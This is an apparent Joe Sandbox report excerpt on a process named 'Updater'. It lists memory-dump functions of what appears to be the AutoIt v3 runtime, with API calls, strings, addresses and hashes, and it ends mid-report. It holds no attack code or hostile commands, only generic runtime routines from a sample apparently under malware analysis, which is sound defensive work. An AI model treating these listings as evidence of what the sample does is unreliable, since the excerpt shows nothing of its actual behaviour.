ISCHECKED, xrefs: 00BB05CC
GETLINECOUNT, xrefs: 00BB066C
ISVISIBLE, xrefs: 00BB0294, 00BB02AF
HIDEDROPDOWN, xrefs: 00BB0464
GETSELECTED, xrefs: 00BB0641

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$MessageSend$Window$BuffCharEnabledUpperVisible
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 37000740-45149045
Opcode ID: 47e94a4dddbdfcac80b4fde9d63621a027c565d50ce1007806b5ec9e635c78b8
Instruction ID: 7af57e34e1833cf9a26a655324d222f111fadc008fb61ddd98d806e77407a28e
Opcode Fuzzy Hash: 47e94a4dddbdfcac80b4fde9d63621a027c565d50ce1007806b5ec9e635c78b8
Instruction Fuzzy Hash: BB0269342142118FCB14FF14C495ABABBE1EF94344F1444E8F94A5B3A2DBB1ED4ACB96

Function 00B355FB Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00B35689
SendMessageW.USER32(00450075,00001308,?,00000000), ref: 00B79128
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B79161
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B7958E

Part of subcall function 00B3438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B35687,01472BD8,?,?,?), ref: 00B343EF

SendMessageW.USER32(?,00001053), ref: 00B795CA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B795E1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B795F7
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B79602

Strings

0, xrefs: 00B7941E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: f394f693797d8c0610ad39ea233b809a4f77dd9783eb88c6f413ecd52b327abc
Instruction ID: 2dc82be244982fe2dd6578e773bd38715a92436c0af5de81e9edd914ca3659d3
Opcode Fuzzy Hash: f394f693797d8c0610ad39ea233b809a4f77dd9783eb88c6f413ecd52b327abc
Instruction Fuzzy Hash: F4128E30604611EFDB25DF24C885BA9BBE5FF44310F6485A9F4AA8B662CB71EC42CF51

Function 00BA32BC Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 289windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00BA32EF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BA33BA
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BA33F8
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00BA3408
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00BA344E
GetClientRect.USER32(00000000,?), ref: 00BA345A
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BA34A1
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BA34B0
GetStockObject.GDI32(00000011), ref: 00BA34C0
SelectObject.GDI32(00000000,00000000), ref: 00BA34C4
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00BA34D4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA34DD
DeleteDC.GDI32(00000000), ref: 00BA34E6
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BA3512
SendMessageW.USER32(00000030,00000000,00000001), ref: 00BA3529
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BA3564
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BA3578
SendMessageW.USER32(00000404,00000001,00000000), ref: 00BA3589
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BA35B9
GetStockObject.GDI32(00000011), ref: 00BA35C4
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BA35CF
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00BA35D9

Strings

AutoIt v3, xrefs: 00BA3446
static, xrefs: 00BA349B, 00BA35B3
msctls_progress32, xrefs: 00BA355A
DISPLAY, xrefs: 00BA34A6

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 41e9195e671bc35f21c5f7f5735204613d0bbd32854700eacc4a8960f8bfeeaf
Instruction ID: 37de9f3a0fcd5f10152893806b95cac1706713b56174d5afed6282720f040be7
Opcode Fuzzy Hash: 41e9195e671bc35f21c5f7f5735204613d0bbd32854700eacc4a8960f8bfeeaf
Instruction Fuzzy Hash: 11A14171A40215BFEB14DF65DC49FAE7BF9EB45710F008154FA15AB2E0DAB8AE00CB64

Function 00B95681 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 193COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B9568F
GetDriveTypeW.KERNEL32(?,?,PhysicalDrive,\\.\), ref: 00B9576F
SetErrorMode.KERNEL32(00000000,?,PhysicalDrive,\\.\), ref: 00B958DB

Strings

Fibre, xrefs: 00B95852
Unknown, xrefs: 00B95792, 00B95828
CDROM, xrefs: 00B957A0
MMC, xrefs: 00B95883
SSD, xrefs: 00B957EF
1394, xrefs: 00B95844
\\.\, xrefs: 00B956E1
iSCSI, xrefs: 00B95867
SCSI, xrefs: 00B9582F
SAS, xrefs: 00B9586E
SSA, xrefs: 00B9584B
FileBackedVirtual, xrefs: 00B95891
RAMDisk, xrefs: 00B95799
SATA, xrefs: 00B95875
Removable, xrefs: 00B957B5, 00B957BA
PhysicalDrive, xrefs: 00B9573E
Network, xrefs: 00B957A7
RAID, xrefs: 00B95860
Fixed, xrefs: 00B957AE
USB, xrefs: 00B95859
Virtual, xrefs: 00B9588A
ATA, xrefs: 00B9583D
ATAPI, xrefs: 00B95836

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 29754284a15d0ffe8af17106a20f20dd1885af94424e8fd963bb5f0845a38580
Instruction ID: f50b1181f214a4827c8d0f949f1250ba32a3257644c954163abc43652377d4db
Opcode Fuzzy Hash: 29754284a15d0ffe8af17106a20f20dd1885af94424e8fd963bb5f0845a38580
Instruction Fuzzy Hash: 1861B470AC8A45EBCB22DF65D9E187C77E1EB04340B2480F5E40AAB2A2DB75DE41DB51

Function 00BB0C42 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 354windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BB0CF0
_wcslen.LIBCMT ref: 00BB0D27
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB0D68
_wcslen.LIBCMT ref: 00BB0D78
_wcslen.LIBCMT ref: 00BB0DBF
_wcslen.LIBCMT ref: 00BB0E31
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BB0E72
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BB0EA4

Part of subcall function 00B4014F: _wcslen.LIBCMT ref: 00B4015A

Part of subcall function 00B83498: SendMessageW.USER32(?,0000102B,?,00000000), ref: 00B834F8

Strings

DESELECT, xrefs: 00BB0F5B
VIEWCHANGE, xrefs: 00BB102D
SELECTINVERT, xrefs: 00BB0F3D
ISSELECTED, xrefs: 00BB0E7D
FINDITEM, xrefs: 00BB0FE1
GETSELECTEDCOUNT, xrefs: 00BB0E2C, 00BB0E3D
SELECT, xrefs: 00BB0EFD
GETITEMCOUNT, xrefs: 00BB0D22, 00BB0D35
SELECTCLEAR, xrefs: 00BB0ED9
SELECTALL, xrefs: 00BB0EB5
GETSUBITEMCOUNT, xrefs: 00BB0D73, 00BB0D86
GETTEXT, xrefs: 00BB0DBA, 00BB0DCD
GETSELECTED, xrefs: 00BB0F9B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 594189b5d31757631548895a80da16c692089d664e39d3cc521541a87b8992ff
Instruction ID: cd14ceddd73ceb9e5dc82b76689daf668ccf2936cc725b836c84444019534999
Opcode Fuzzy Hash: 594189b5d31757631548895a80da16c692089d664e39d3cc521541a87b8992ff
Instruction Fuzzy Hash: 62D1C0302042119BCB14FF28C891ABAB7E5EF84754F1449ECF85A9B3A2DBB1ED45CB51

Function 00BB1934 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 282windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BB1A60
GetDesktopWindow.USER32 ref: 00BB1A75
GetWindowRect.USER32(00000000), ref: 00BB1A7C
GetWindowLongW.USER32(?,000000F0), ref: 00BB1AD5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BB1B0E
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB1B2C
DestroyWindow.USER32(?), ref: 00BB1B4A
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BB1B6C
SendMessageW.USER32(?,00000421,?,?), ref: 00BB1B81
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BB1B94
IsWindowVisible.USER32(?), ref: 00BB1BB4
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BB1BCF
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BB1BE3
GetWindowRect.USER32(?,?), ref: 00BB1BFB
MonitorFromPoint.USER32(00000000,00000000,00000002), ref: 00BB1C21
GetMonitorInfoW.USER32(00000000,?), ref: 00BB1C3B
CopyRect.USER32(?,?), ref: 00BB1C52
SendMessageW.USER32(?,00000412,00000000), ref: 00BB1CBD

Strings

tooltips_class32, xrefs: 00BB1B07
(, xrefs: 00BB1C2E
0, xrefs: 00BB1A0B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c626a2ca114702bf329809a0a41263844705dcd378e9018ab8baef1dea5c792b
Instruction ID: 34c728d2cffe1e80e1b0cfba7b4337ba4d3f6ed67a048d5a321bd0f57af448af
Opcode Fuzzy Hash: c626a2ca114702bf329809a0a41263844705dcd378e9018ab8baef1dea5c792b
Instruction Fuzzy Hash: A0B19D70604341AFC714CF28C894AABBBE5FF89310F408A5CF59A9B261DBB4ED45CB65

Function 00B85217 Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 381COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B852BE

Part of subcall function 00B85096: CharUpperBuffW.USER32(?,?,00000000,00BBD938,?,00000000,?,?,?,00B85334,-00000001,-00000001,-00000002,-00000001), ref: 00B85123

_wcslen.LIBCMT ref: 00B85344
_wcslen.LIBCMT ref: 00B853B0
GetForegroundWindow.USER32 ref: 00B853F5
_wcslen.LIBCMT ref: 00B85406
IsWindow.USER32(?), ref: 00B85446
_wcslen.LIBCMT ref: 00B85483
_wcslen.LIBCMT ref: 00B854DE
_wcslen.LIBCMT ref: 00B85547
_wcslen.LIBCMT ref: 00B855AB
_wcslen.LIBCMT ref: 00B8560C
_wcslen.LIBCMT ref: 00B8566C

Strings

REGEXPCLASS, xrefs: 00B85542, 00B85555
ACTIVE, xrefs: 00B853AB, 00B853BE
CLASS, xrefs: 00B854D9, 00B854EC
REGEXPTITLE, xrefs: 00B8547E, 00B85491
LAST, xrefs: 00B8533F, 00B8535E
HANDLE, xrefs: 00B85401, 00B85414

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$Window$Foreground$BuffCharUpper
String ID: ACTIVE$CLASS$HANDLE$LAST$REGEXPCLASS$REGEXPTITLE
API String ID: 86693105-4025514379
Opcode ID: 827c9420f5c28d978ad6712be42e3261b1310ea74c577349c74f3f3a3833f874
Instruction ID: 9d6e3b8982cc28120592ea67ad0cb0dc5b67eeffb63523f127b37db85feb6c44
Opcode Fuzzy Hash: 827c9420f5c28d978ad6712be42e3261b1310ea74c577349c74f3f3a3833f874
Instruction Fuzzy Hash: 32E1F871A00B029BCB24EF68C481ABAB7E1FF60340F4445BDE45687265FB70ED59CB92

Function 00BACDB7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BACEBD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00BBD938,00000000,?,00000000,?,?), ref: 00BACF44
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00BACFA4
_wcslen.LIBCMT ref: 00BACFF4
_wcslen.LIBCMT ref: 00BAD06F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00BAD0B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00BAD1C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00BAD24D
RegCloseKey.ADVAPI32(?), ref: 00BAD281
RegCloseKey.ADVAPI32(00000000), ref: 00BAD28E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00BAD360

Strings

REG_MULTI_SZ, xrefs: 00BAD0F5
REG_EXPAND_SZ, xrefs: 00BACFCD
REG_SZ, xrefs: 00BAD044
REG_DWORD, xrefs: 00BAD204
REG_QWORD, xrefs: 00BAD2C3
REG_BINARY, xrefs: 00BAD313

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: f8ce46f4f54e54922d76438d5aa3ef629a2d34654b6e5f6d927b068715318868
Instruction ID: e7f8bfd8a1adc2ca714b41c8923b17ae7577ca70e8722bb9d4f1732b6b9dcffd
Opcode Fuzzy Hash: f8ce46f4f54e54922d76438d5aa3ef629a2d34654b6e5f6d927b068715318868
Instruction Fuzzy Hash: D1126A35208211AFCB14DF14C891B2ABBE5FF89714F14849CF95A9B3A2CB35EE41CB95

Function 00BB12EA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 324windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BB1398
_wcslen.LIBCMT ref: 00BB13CF
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB1410
_wcslen.LIBCMT ref: 00BB1435
_wcslen.LIBCMT ref: 00BB1488
_wcslen.LIBCMT ref: 00BB14E2

Part of subcall function 00B4014F: _wcslen.LIBCMT ref: 00B4015A

Part of subcall function 00B83A35: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00B83A67

Strings

EXISTS, xrefs: 00BB14DD, 00BB14EE
GETTOTALCOUNT, xrefs: 00BB13CA, 00BB13DD
COLLAPSE, xrefs: 00BB1483, 00BB1496
ISCHECKED, xrefs: 00BB1619
UNCHECK, xrefs: 00BB1672
CHECK, xrefs: 00BB1430, 00BB1443
GETTEXT, xrefs: 00BB15D7
EXPAND, xrefs: 00BB1538
SELECT, xrefs: 00BB1647
GETSELECTED, xrefs: 00BB1596
GETITEMCOUNT, xrefs: 00BB1568

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 7ed47b6381aa9ca7713928735bedc2979d4793f487d89b37c1a4c92768ad181f
Instruction ID: 4ea5b3bf1b13ca031c293effcf67db2fe744af4ec8c401504e5905247223e7b7
Opcode Fuzzy Hash: 7ed47b6381aa9ca7713928735bedc2979d4793f487d89b37c1a4c92768ad181f
Instruction Fuzzy Hash: BBC1C2706042119FCB14EF28C461ABAB7E1EF94704F4448ECF85A5B3A2DB75EE46CB91

Function 00B305DB Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 277COMMON

Download Yara Rule

Strings

#requireadmin, xrefs: 00B30664
#comments-end, xrefs: 00B3073E
', xrefs: 00B76968
#cs, xrefs: 00B306D8, 00B3072A
#OnAutoItStartRegister, xrefs: 00B3067C
Unterminated group of comments, xrefs: 00B76A95
", xrefs: 00B76952
#include, xrefs: 00B306AC
#pragma compile, xrefs: 00B30638
#include-once, xrefs: 00B30694
Cannot parse #include, xrefs: 00B76A82
#ce, xrefs: 00B30752
#notrayicon, xrefs: 00B3064C
Bad directive syntax error, xrefs: 00B76999
#comments-start, xrefs: 00B306C4, 00B30716

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: a1d3f4e5a85f6c6ef224c7a5970e05b63c909445ebe36ff275a7f75dbb324b3b
Instruction ID: 4063a49f5cbca515e4340db3898e19ec30498cd558f6b9c8fb8bd5d6373c3c1f
Opcode Fuzzy Hash: a1d3f4e5a85f6c6ef224c7a5970e05b63c909445ebe36ff275a7f75dbb324b3b
Instruction Fuzzy Hash: 3691D471A40609BBDB11BF64CC53FAE37E8EF54300F1480E5F909AA196EBB0DA11D7A1

Function 00BB8D07 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB8D25
_wcslen.LIBCMT ref: 00BB8D39
_wcslen.LIBCMT ref: 00BB8D5C
_wcslen.LIBCMT ref: 00BB8D7F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BB8DC1
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00BB3FB0,?), ref: 00BB8E23
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BB8E5C
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BB8E9F
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BB8ED6
FreeLibrary.KERNEL32(?), ref: 00BB8EE2
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BB8EF2
DestroyIcon.USER32(?), ref: 00BB8F01
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BB8F1E
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BB8F2A

Strings

.dll, xrefs: 00BB8D76
.exe, xrefs: 00BB8D53
.icl, xrefs: 00BB8D33

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: d6ce6f537d63f0a2f0282ad536a41a3edb246cec839a2e9aa7f35d1c4cf9e876
Instruction ID: aed67defc43901bb9d6187d7b2c290941ff242c9128fedbf2bfc2c4620cf27c8
Opcode Fuzzy Hash: d6ce6f537d63f0a2f0282ad536a41a3edb246cec839a2e9aa7f35d1c4cf9e876
Instruction Fuzzy Hash: 85619D71500215FBEB289F64CC45BFA77ECEB08711F10429AF919D61D0DFB99A90DBA0

Function 00B94A8B Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 177COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B94B0A
_wcslen.LIBCMT ref: 00B94B15
_wcslen.LIBCMT ref: 00B94B5C
_wcslen.LIBCMT ref: 00B94B93
GetDriveTypeW.KERNEL32(?), ref: 00B94BC7
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94C10
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94C4A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B94C7F

Strings

open , xrefs: 00B94BD6
set cd door , xrefs: 00B94C16
type cdaudio alias cd wait, xrefs: 00B94BF2
closed, xrefs: 00B94B41, 00B94B8E, 00B94BA3
close cd wait, xrefs: 00B94C67
wait, xrefs: 00B94C32
close, xrefs: 00B94B10, 00B94B23
open, xrefs: 00B94B57, 00B94B6A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

